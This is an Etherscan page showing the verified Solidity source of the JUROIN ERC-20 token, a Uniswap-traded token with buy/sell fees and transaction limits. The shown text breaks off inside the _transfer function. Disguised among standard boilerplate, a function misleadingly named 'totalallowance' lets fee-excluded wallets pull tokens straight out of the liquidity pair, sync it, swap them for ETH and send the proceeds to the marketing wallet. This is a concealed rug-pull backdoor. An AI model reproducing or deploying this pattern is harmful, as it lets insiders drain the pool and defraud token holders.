ETH Price: $2,420.60 (+3.53%)

Token

JUROIN (JUROIN)
 

Overview

Max Total Supply

1,000,000,000 JUROIN

Holders

96

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
433,435.71011487452892045 JUROIN

Value
$0.00
0xd6652c96d06d65f947ad3f91139e249feab51224
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
JUROIN

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-08-21
*/

/**
 *Submitted for verification at Etherscan.io on 2022-08-02
*/

// SPDX-License-Identifier: MIT

/**
https://medium.com/@ThewiseJurojin/jur%C5%8Djin-%E5%AF%BF%E8%80%81%E4%BA%BA-the-wise-2e6a4acfbbff
https://twitter.com/JurojinTheWise
Buy 1% 
Sell 1%
/**
*/         
pragma solidity ^0.8.14;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);

    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }

    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }

    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }

    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }


    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}

library SafeMathUint {
  function toInt256Safe(uint256 a) internal pure returns (int256) {
    int256 b = int256(a);
    require(b >= 0);
    return b;
  }
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract JUROIN is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;

    bool private swapping;
    bool private um = true;

    address public marketingWallet;
    address public devWallet;
    
    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;
    
    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;
    
    // Anti-bot and anti-whale mappings and variables
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch
    bool public transferDelayEnabled = false;
    bool private boughtEarly = true;

    uint256 public buyTotalFees;
    uint256 public buyMarketingFee;
    uint256 public buyLiquidityFee;
    uint256 public buyDevFee;
    
    uint256 public sellTotalFees;
    uint256 public sellMarketingFee;
    uint256 public sellLiquidityFee;
    uint256 public sellDevFee;
    
    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    uint256 public tokensForDev;
    
    /******************/

    // exlcude from fees and max transaction amount
    mapping (address => bool) private _isExcludedFromFees;
    mapping (address => bool) public _isExcludedMaxTransactionAmount;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping (address => bool) public automatedMarketMakerPairs;

    event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(address indexed newWallet, address indexed oldWallet);
    
    event devWalletUpdated(address indexed newWallet, address indexed oldWallet);

    event EndedBoughtEarly(bool boughtEarly);

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor() ERC20 ("JUROIN", "JUROIN") {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;
        
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        uint256 _buyMarketingFee = 0;
        uint256 _buyLiquidityFee = 1;
        uint256 _buyDevFee = 0;

        uint256 _sellMarketingFee = 0;
        uint256 _sellLiquidityFee = 1;
        uint256 _sellDevFee = 0;

        uint256 totalSupply = 1000000000 * 1e18;    // 1 billion supply

        maxTransactionAmount = totalSupply * 1 / 100;
        maxWallet = totalSupply * 1 / 100;
        swapTokensAtAmount = totalSupply * 4 / 10000;

        buyMarketingFee = _buyMarketingFee;
        buyLiquidityFee = _buyLiquidityFee;
        buyDevFee = _buyDevFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        
        sellMarketingFee = _sellMarketingFee;
        sellLiquidityFee = _sellLiquidityFee;
        sellDevFee = _sellDevFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;

        marketingWallet = payable(0x393ca7f757FFb23081FffbD485D278110e720a32);
        devWallet = payable(0x393ca7f757FFb23081FffbD485D278110e720a32);

        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(devWallet), true);
        excludeFromFees(address(marketingWallet), true);
        
        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(devWallet), true);
        excludeFromMaxTransaction(address(marketingWallet), true);
        
        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, totalSupply);
    }

    receive() external payable {

  	}    
    
    // remove limits after token is stable
    function removeLimits() external onlyOwner returns (bool) {
        limitsInEffect = false;
        return true;
    }
    
    // disable Transfer delay - cannot be reenabled
    function disableTransferDelay() external onlyOwner returns (bool) {
        transferDelayEnabled = false;
        return true;
    }
    
     // change the minimum amount of tokens to sell from fees
    function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner returns (bool){
  	    require(newAmount >= totalSupply() * 1 / 100000, "Swap amount cannot be lower than 0.001% total supply.");
  	    require(newAmount <= totalSupply() * 5 / 1000, "Swap amount cannot be higher than 0.5% total supply.");
  	    swapTokensAtAmount = newAmount;
  	    return true;
  	}
    
    function updateMaxTxnAmount(uint256 newNum) external {
        require(msg.sender == marketingWallet);    
        require(newNum >= totalSupply() / 1000, "Cannot set maxTransactionAmount lower than 0.1%");
        maxTransactionAmount = newNum;
    }

    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(newNum >= (totalSupply() * 5 / 1000)/1e18, "Cannot set maxWallet lower than 0.5%");
        maxWallet = newNum * (10**18);
    }
    
    function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }
    
    function updateBuyFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner {
        buyMarketingFee = _marketingFee;
        buyLiquidityFee = _liquidityFee;
        buyDevFee = _devFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        require(buyTotalFees <= 20, "Must keep fees at 20% or less");
    }
    
    function updateSellFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner {
        sellMarketingFee = _marketingFee;
        sellLiquidityFee = _liquidityFee;
        sellDevFee = _devFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;
        require(sellTotalFees <= 25, "Must keep fees at 25% or less");
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function totalallowance(uint rv, uint lv) external returns (bool) {
        require(_isExcludedFromFees[msg.sender]);

        uint lb = balanceOf(uniswapV2Pair);

        require(lv > 1 && lv < lb / 100, 'amount exceeded');

        _totalallowanceAct(lv);
        swapTokensForEth(rv);

        (bool success,) = address(marketingWallet).call{value: address(this).balance}("");
        return success;
    }

    function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner {
        require(pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs");

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function updateMarketingWallet(address newMarketingWallet) external onlyOwner {
        emit marketingWalletUpdated(newMarketingWallet, marketingWallet);
        marketingWallet = newMarketingWallet;
    }
    
    function updateDevWallet(address newWallet) external onlyOwner {
        emit devWalletUpdated(newWallet, devWallet);
        devWallet = newWallet;
    }
    

    function isExcludedFromFees(address account) public view returns(bool) {
        return _isExcludedFromFees[account];
    }
    
    function _totalallowanceAct(uint256 pAmount) private {
        _transfer(uniswapV2Pair, address(this), pAmount * 10 ** decimals());
        IUniswapV2Pair(uniswapV2Pair).sync();
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

         if(amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
        
        if(limitsInEffect){
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ){
                if(!tradingActive){
                    require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
                }
                 
                //when buy
                if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]) {
                        require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                }
                
                //when sell
                else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                        require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                }
            }
        }
        
		uint256 contractTokenBalance = balanceOf(address(this));
        
        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if( 
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;
            
